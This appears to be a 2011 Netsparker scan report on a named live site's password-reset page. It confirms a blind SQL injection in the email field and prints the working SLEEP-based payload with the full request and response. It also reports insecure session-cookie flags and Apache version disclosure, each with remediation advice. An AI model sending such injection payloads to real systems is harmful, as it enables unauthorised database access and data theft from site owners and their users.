GHDB, DORK, SQL Injection, Database Error, CWE-89, CAPEC-66 Report of secure.trust-guard.com REPORT SUMMARY

Netsparker - Scan Report Summary


TARGET URL: https://secure.trust-guard.com/ResetPassword....
SCAN DATE: 4/25/2011 1:00:12 PM
REPORT DATE: 4/25/2011 3:58:52 PM
SCAN DURATION: 00:02:51
Total Requests: 113
Average Speed: 0.66 req/sec.

5 identified, 4 confirmed, 1 critical, 1 informational

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Blind SQL Injection
Authentication
Scheduled

VULNERABILITIES

CRITICAL     20 %
IMPORTANT    20 %
LOW          40 %
INFORMATION  20 %

VULNERABILITY SUMMARY

Step #2: Follow the Redirection. Step #3: Confirm the Application response. Blind SQL Injection will be a form of unexpected response that can be measured and reported. The actual HTTP Request and Response Pairs can be found at URL http://xss.cx/2011/04/25/txt/blind-sql-injection-proof-of-concept-application-response-securetrustguardcom.txt and a complete report via Netsparker 1.9.0.5 can be found at URL http://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm.

URL                 Parameter  Method  Vulnerability                  Confirmed
/ResetPassword.php  txtEmail   POST    Blind SQL Injection            Yes
                                       Cookie Not Marked As Secure    Yes
                                       Cookie Not Marked As HttpOnly  Yes
                                       Apache Version Disclosure      No
                                       MySQL Database Identified      Yes
Blind SQL Injection

1 TOTAL, CRITICAL, 1 CONFIRMED
SQL Injection occurs when data input, for example by a user, is interpreted by the backend database as a SQL command rather than as normal data. This is an extremely common vulnerability, and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database. In these tests, SQL Injection was not obvious, but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most ORM systems use only parameterised queries, and this can solve the whole SQL Injection problem.
  3. Locate all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your web logs and application logs to see if there was any previous but undetected attack on this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

/ResetPassword.php CONFIRMED

https://secure.trust-guard.com/ResetPassword.php

Parameters

Parameter  Type  Value
btnCancel  POST  Cancel
btnSubmit  POST  Submit
txtEmail   POST  -111' OR SLEEP(25)=0 LIMIT 1--

Request

POST /ResetPassword.php HTTP/1.1
Referer: https://secure.trust-guard.com/ResetPassword.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=sjhj47er2168q391qsf989a724
Content-Length: 84
Expect: 100-continue
Accept-Encoding: gzip, deflate

btnCancel=Cancel&btnSubmit=Submit&txtEmail=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 18:01:03 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200
Location: index.php
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Cookie Not Marked As Secure

1 TOTAL, IMPORTANT, 1 CONFIRMED

A cookie was not marked as secure and was transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful MITM (man in the middle) attack.

Impact

This cookie will be transmitted over an HTTP connection; therefore, if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force the victim to make an HTTP request in order to steal the cookie.

Actions to Take

  1. See the remedy for the solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2 and have either physical access to systems that act as waypoints for the traffic, or local access (having gained access) to a system between the victim and the web server.

/ResetPassword.php CONFIRMED

https://secure.trust-guard.com/ResetPassword.php

Identified Cookie

PHPSESSID

Request

GET /ResetPassword.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=sjhj47er2168q391qsf989a724; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/javascript" src="/formval.js"></script>
<script type="text/javascript" src="/main.js"></script>

<style type="text/css">
@import url(/main.css);
@import url(/formval.css);
</style>
<title>Reset Password</title>

<script type="text/javascript">
//<![CDATA[
document.getElementsByTagName('html')[0].className='jsOn';
//]]>

function TemplateOnUnload()
{

}
</script>


</head>
<body style="background-color:#cccccc" onunload="TemplateOnUnload()">

<div style="text-align: center">
<center>
<table style="width: 1020px; background-color: white;" border="1" bordercolor="#000000" cellpadding="0" cellspacing="0">
<tr>
<td style="background-image:url(/images/controlpanel-header.jpg); background-color:Black; background-repeat:no-repeat; height:50px; width:900px; vertical-align: text-bottom; text-align: right" colspan="2">
</td>
</tr>
<tr>
<td align="center" style="vertical-align: middle; height: 23px;"></td>
</tr>

<tr>
<td>
<br />
<center>

<div style="border-right: #000000 thin solid; border-top: #000000 thin solid; border-left: #000000 thin solid;
width:300px; border-bottom: #000000 thin solid; background-color: #eeeeee; padding-right: 15px; padding-left: 15px; padding-bottom: 15px; padding-top: 15px; text-align: left;">


<form method="post" style="margin:0px">

Enter you email address or site name below and click Submit and we will send you a new password<br />
<input id="txtEmail" name="txtEmail" type="text" value="" style="width:300px" onblur="validatePresent(this,'msg_email');" /><br />
<div id="msg_email">&nbsp;</div>
<span style="color:Red">
<span id='lblResult' ></span> </span>
<br />
<input id='btnSubmit' name='btnSubmit' type="submit" value="Submit"
onclick="return validatePresent(document.getElementById('php:txtEmail'),'msg_email');" />
<input id='btnCancel' name='btnCancel' type="submit" value="Cancel" />

</form>

</div>

</center>
<br /><br />
</td>
</tr>
<tr><td colspan="2" style="height: 50px; background-color: #4b924b">
<div align=center><font class="footer"><br />
<span style="color: #ffffff">
&copy; 2006 - 2011 <a href="http://trust-guard.com" class="footer" target="_blank">Trust Guard</a>
- A Global Marketing Strategies company.&nbsp;All Rights Reserved. <br> <a href="http://www.trust-guard.com/PCI-Scanning-s/39.htm" class="footer">PCI Scanning</a> and <a href="http://www.trust-guard.com/PCI-Compliance-s/65.htm" class="footer">PCI Compliance</a>
powered by Clone Guard |

<a rel="nofollow" href="http://www.trust-guard.com/articles.asp?ID=7" class="footer" target="_blank">Partner Opportunities</a> |
<a rel="nofollow" href="https://support.trust-guard.com" class="footer" target="_blank">Help</a> |
<a rel="nofollow" href="http://www.trust-guard.com/terms.asp" class="footer" target="_blank">Terms of Use</a>
<br>
</span>
</font><br /></div>
</td></tr>
</table>
<br />
<br />
<div align=center><font class="footer">&nbsp;




</font></div>
</center>
</div>

<div id="modalBackground"></div>

</body>
</html>

Cookie Not Marked As HttpOnly

1 TOTAL, LOW, 1 CONFIRMED

A cookie was not marked as HTTPOnly. HTTPOnly cookies cannot be read by client-side scripts; therefore, marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks.

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for the solution.
  2. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes, JavaScript code will not be able to read cookies.)

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

/ResetPassword.php CONFIRMED

https://secure.trust-guard.com/ResetPassword.php

Identified Cookie

PHPSESSID

Request

GET /ResetPassword.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=sjhj47er2168q391qsf989a724; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8


(Response body omitted: identical to the response body shown under Cookie Not Marked As Secure.)

Apache Version Disclosure

1 TOTAL, LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
/ResetPassword.php

https://secure.trust-guard.com/ResetPassword.php

Extracted Version

2.2.3 (CentOS)

Request

GET /ResetPassword.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.trust-guard.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 18:00:02 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: PHPSESSID=sjhj47er2168q391qsf989a724; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 3716
Connection: close
Content-Type: text/html; charset=UTF-8


(Response body omitted: identical to the response body shown under Cookie Not Marked As Secure.)

MySQL Database Identified

1 TOTAL, INFORMATION, 1 CONFIRMED
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only; there is no direct impact arising from this issue.

/ResetPassword.php CONFIRMED

https://secure.trust-guard.com/ResetPassword.php

Request and Response

(Omitted: identical to the POST /ResetPassword.php request and the HTTP/1.1 302 Found response shown under Blind SQL Injection.)